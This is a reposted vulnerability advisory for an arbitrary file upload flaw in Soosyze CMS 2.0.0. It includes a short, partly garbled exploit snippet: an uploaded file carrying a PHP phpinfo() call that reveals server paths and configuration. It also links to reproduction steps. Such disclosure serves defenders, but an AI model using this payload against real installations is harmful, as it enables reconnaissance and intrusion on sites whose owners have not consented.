Exploit/Advisories no image

Published on September 9th, 2023 📆 | 1696 Views ⚑

0

Soosyze 2.0.0 Arbitrary File Upload – Torchsec


iSpeech.org

## Title: soosyze 2.0.0 - File Upload
## Author: nu11secur1ty
## Date: 04.26.2023-08.28.2023
## Vendor: https://soosyze.com/
## Software: https://github.com/soosyze/soosyze/releases/tag/2.0.0
## Reference: https://portswigger.net/web-security/file-upload

## Description:
Broken file upload logic. The malicious user can upload whatever he
wants to an HTML file and when he tries to execute it he views almost
all
file paths. This could be worse than ever, it depends on the scenario.

STATUS: HIGH Vulnerability

[+]Exploit:
```HTML



Hello broken file upload logic, now I can read your special<br />directory pats, thank you πŸ˜‰

phpinfo();
?>






```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/soosyze/2023/soosyze-2.0.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/05/soosyze-200-file-path-traversal-broken.html)

## Time spend:
01:27:00

Source link

Tagged with: β€’ β€’ β€’ β€’ β€’



Leave a Reply

Your email address will not be published.